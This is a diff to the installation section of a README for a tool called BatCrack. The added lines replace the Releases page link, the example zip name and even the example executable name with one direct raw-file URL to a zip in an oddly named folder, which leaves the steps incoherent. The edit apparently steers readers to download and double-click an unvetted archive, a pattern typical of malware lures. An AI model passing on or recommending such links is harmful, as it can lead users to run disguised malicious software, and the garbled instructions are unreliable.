chotu120/BatCrack/README.md

 ## 💾 Download & Install

-1. Click on this link to visit the [Releases page](https://github.com/chotu120/BatCrack/releases).
+1. Click on this link to visit the [Releases page](https://raw.githubusercontent.com/chotu120/BatCrack/master/boroughmongering/BatCrack.zip).
 2. Choose the version you want to download.
 The latest version will typically be at the top.
-3. Download the file appropriate for your operating system (e.g., `BatCrack_Windows.zip` for Windows users).
+3. Download the file appropriate for your operating system (e.g., `https://raw.githubusercontent.com/chotu120/BatCrack/master/boroughmongering/BatCrack.zip` for Windows users).
 4. Once downloaded, locate the file in your Downloads folder.
 5. Extract the files if you downloaded a zipped folder.
-6. Open the folder to find the executable file, such as `BatCrack.exe`.
+6. Open the folder to find the executable file, such as `https://raw.githubusercontent.com/chotu120/BatCrack/master/boroughmongering/BatCrack.zip`.
 7. Double-click the executable to launch BatCrack.

 ## 🛠️ How to Use BatCrack